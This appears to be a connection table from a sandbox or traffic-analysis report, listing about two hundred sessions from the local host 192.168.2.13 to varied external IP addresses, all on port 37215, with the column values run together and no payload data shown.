                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3919192.168.2.133763041.228.62.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3920192.168.2.1355510157.189.224.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3921192.168.2.1349672181.56.41.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3922192.168.2.1346538197.23.209.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3923192.168.2.1344640157.252.167.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3924192.168.2.1351160197.221.31.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3925192.168.2.1346844197.206.152.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3926192.168.2.1349236196.19.199.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3927192.168.2.1348450197.59.235.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3928192.168.2.1349768197.95.166.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3929192.168.2.1352682197.160.184.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3930192.168.2.135175041.87.65.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3931192.168.2.134601041.65.155.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3932192.168.2.1338354197.77.196.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3933192.168.2.1333424157.152.10.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3934192.168.2.1349346157.56.45.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3935192.168.2.1350504197.209.90.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3936192.168.2.135572841.168.9.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3937192.168.2.135409642.24.80.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3938192.168.2.1358826210.97.93.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3939192.168.2.1357680132.250.103.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3940192.168.2.1342796157.103.200.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3941192.168.2.1360646212.51.161.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3942192.168.2.1359236197.244.67.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3943192.168.2.134246079.142.46.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3944192.168.2.1340536157.254.28.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3945192.168.2.1337244139.84.177.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3946192.168.2.135160641.186.209.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3947192.168.2.1334718197.213.32.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3948192.168.2.133546441.20.67.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3949192.168.2.1338834108.229.226.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3950192.168.2.135057641.192.30.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3951192.168.2.1337788157.87.55.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3952192.168.2.1350776103.198.27.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3953192.168.2.1352938197.54.27.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3954192.168.2.1351646157.106.62.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3955192.168.2.133565624.61.185.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3956192.168.2.134932474.171.190.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3957192.168.2.1337372209.106.249.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3958192.168.2.135539441.204.86.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3959192.168.2.1338294157.155.198.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3960192.168.2.134679241.234.152.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3961192.168.2.1340464199.56.160.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3962192.168.2.135538474.253.164.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3963192.168.2.135231241.141.32.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3964192.168.2.1333002184.95.65.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3965192.168.2.1340032135.225.94.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3966192.168.2.134857841.125.162.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3967192.168.2.1350420102.3.102.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3968192.168.2.1345092197.22.7.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3969192.168.2.1353466197.15.149.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3970192.168.2.1351540157.1.5.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3971192.168.2.1334094197.7.8.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3972192.168.2.135143641.203.182.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3973192.168.2.133863841.133.28.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3974192.168.2.1341986197.180.64.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3975192.168.2.133910049.244.91.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3976192.168.2.1341532144.101.181.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3977192.168.2.1349394157.205.235.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3978192.168.2.1354176125.199.159.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3979192.168.2.13580421.243.221.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3980192.168.2.134059675.181.80.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3981192.168.2.1359858197.57.163.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3982192.168.2.1333512157.23.211.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3983192.168.2.134667641.227.253.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3984192.168.2.136028641.82.91.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3985192.168.2.1352350157.240.198.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3986192.168.2.1360354157.196.126.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3987192.168.2.133632012.55.55.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3988192.168.2.1351204119.80.233.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3989192.168.2.1356404197.120.31.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3990192.168.2.133589641.188.69.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3991192.168.2.135320841.81.134.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3992192.168.2.1357954157.123.15.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3993192.168.2.135533841.179.177.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3994192.168.2.1338652157.188.109.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3995192.168.2.134372041.106.180.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3996192.168.2.1358024157.185.125.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3997192.168.2.1334856157.123.64.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3998192.168.2.135444236.158.60.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3999192.168.2.1336494197.157.242.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4000192.168.2.134372241.47.231.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4001192.168.2.1338390157.213.36.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4002192.168.2.1343760167.181.119.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4003192.168.2.1343378197.210.50.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4004192.168.2.1338050157.129.212.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4005192.168.2.135127241.196.102.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4006192.168.2.1341794157.99.42.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4007192.168.2.1341092157.234.2.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4008192.168.2.1338234157.114.143.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4009192.168.2.1358998197.100.103.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4010192.168.2.1360718106.4.151.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4011192.168.2.1354458197.149.175.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4012192.168.2.1347054197.157.183.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4013192.168.2.134282241.1.157.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4014192.168.2.1347738197.52.231.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4015192.168.2.1336800197.182.28.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4016192.168.2.1348354157.133.21.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4017192.168.2.1353818197.230.161.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4018192.168.2.1351928157.147.253.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4019192.168.2.1347908157.43.21.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4020192.168.2.1343786116.61.253.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4021192.168.2.1351292157.213.45.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4022192.168.2.135310841.152.112.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4023192.168.2.1336524157.132.44.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4024192.168.2.135384841.186.76.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4025192.168.2.1351630197.81.10.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4026192.168.2.1353742157.146.216.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4027192.168.2.134216441.52.234.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4028192.168.2.135982441.66.24.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4029192.168.2.135072699.76.118.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4030192.168.2.1333972197.71.62.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4031192.168.2.135276841.79.21.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4032192.168.2.1355038157.240.133.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4033192.168.2.1351386157.201.22.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4034192.168.2.1351758157.23.69.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4035192.168.2.1352962157.78.68.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4036192.168.2.133686841.182.189.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4037192.168.2.1341144149.181.100.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4038192.168.2.135953041.17.90.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4039192.168.2.135471441.51.226.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4040192.168.2.1346438157.155.3.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4041192.168.2.1356644162.233.22.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4042192.168.2.1355318173.182.32.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4043192.168.2.1339746197.104.34.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4044192.168.2.135816441.68.41.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4045192.168.2.135292841.42.39.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4046192.168.2.1353238125.120.13.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4047192.168.2.134950475.61.68.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4048192.168.2.1360392157.50.251.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4049192.168.2.1342882116.132.188.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4050192.168.2.135824241.10.103.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4051192.168.2.1348512211.243.108.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4052192.168.2.1336760157.207.153.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4053192.168.2.1352300157.73.60.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4054192.168.2.1338834197.126.7.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4055192.168.2.1345932158.105.176.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4056192.168.2.1359090157.211.212.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4057192.168.2.133714841.43.225.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4058192.168.2.134055271.55.17.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4059192.168.2.1352166157.99.236.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4060192.168.2.1358092106.175.166.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4061192.168.2.1341422133.77.100.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4062192.168.2.133395441.176.79.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4063192.168.2.1333890157.94.164.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4064192.168.2.134588641.120.16.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4065192.168.2.134885241.224.85.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4066192.168.2.1336298157.201.225.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4067192.168.2.1338118174.22.210.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4068192.168.2.1348518157.142.0.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4069192.168.2.135305041.123.26.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4070192.168.2.1342666197.90.229.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4071192.168.2.1360236197.134.41.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4072192.168.2.1354068197.39.180.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4073192.168.2.135151841.113.103.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4074192.168.2.1341408197.155.150.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4075192.168.2.1343410157.174.118.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4076192.168.2.1344692143.124.145.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4077192.168.2.1347626197.40.150.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4078192.168.2.1350290157.126.150.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4079192.168.2.1351330197.212.175.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4080192.168.2.1335678157.200.196.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4081192.168.2.1335554197.33.62.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4082192.168.2.1354838197.8.49.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4083192.168.2.1336366197.39.124.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4084192.168.2.1337330161.40.190.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4085192.168.2.1353290197.238.252.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4086192.168.2.1339584157.78.170.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4087192.168.2.1346082197.4.197.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4088192.168.2.1338632197.87.205.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4089192.168.2.135067841.183.41.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4090192.168.2.1335496175.58.209.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4091192.168.2.1336684176.178.179.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4092192.168.2.1337014157.69.30.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4093192.168.2.134599041.18.148.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4094192.168.2.135927641.53.5.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4095192.168.2.1352816157.113.118.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4096192.168.2.1348688197.221.149.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4097192.168.2.1334612139.165.138.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4098192.168.2.1339860197.65.135.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4099192.168.2.134709841.199.145.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4100192.168.2.1357832157.152.28.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4101192.168.2.1352382157.110.82.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4102192.168.2.135709441.145.32.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4103192.168.2.1351334197.245.67.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4104192.168.2.135762841.200.87.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4105192.168.2.1332802197.9.62.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4106192.168.2.1348768157.39.134.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4107192.168.2.134053041.108.46.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4108192.168.2.1334342157.105.172.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4109192.168.2.1344920197.213.74.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4110192.168.2.1353674197.2.132.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4111192.168.2.1345220157.168.209.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4112192.168.2.1359590157.11.19.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4113192.168.2.1341134157.41.97.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4114192.168.2.1348322157.189.185.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4115192.168.2.1351112157.180.209.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4116192.168.2.134622441.43.55.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4117192.168.2.133443641.198.156.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4118192.168.2.1333978197.94.152.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4119192.168.2.1343596197.250.215.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4120192.168.2.133474860.174.158.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4121192.168.2.134370241.96.43.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4122192.168.2.1347818157.245.121.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4123192.168.2.1359742167.238.149.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4124192.168.2.1343170205.178.184.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4125192.168.2.1350244157.47.141.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4126192.168.2.1347042147.10.200.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4127192.168.2.135158851.144.38.837215
                                                  TimestampBytes transferredDirectionData


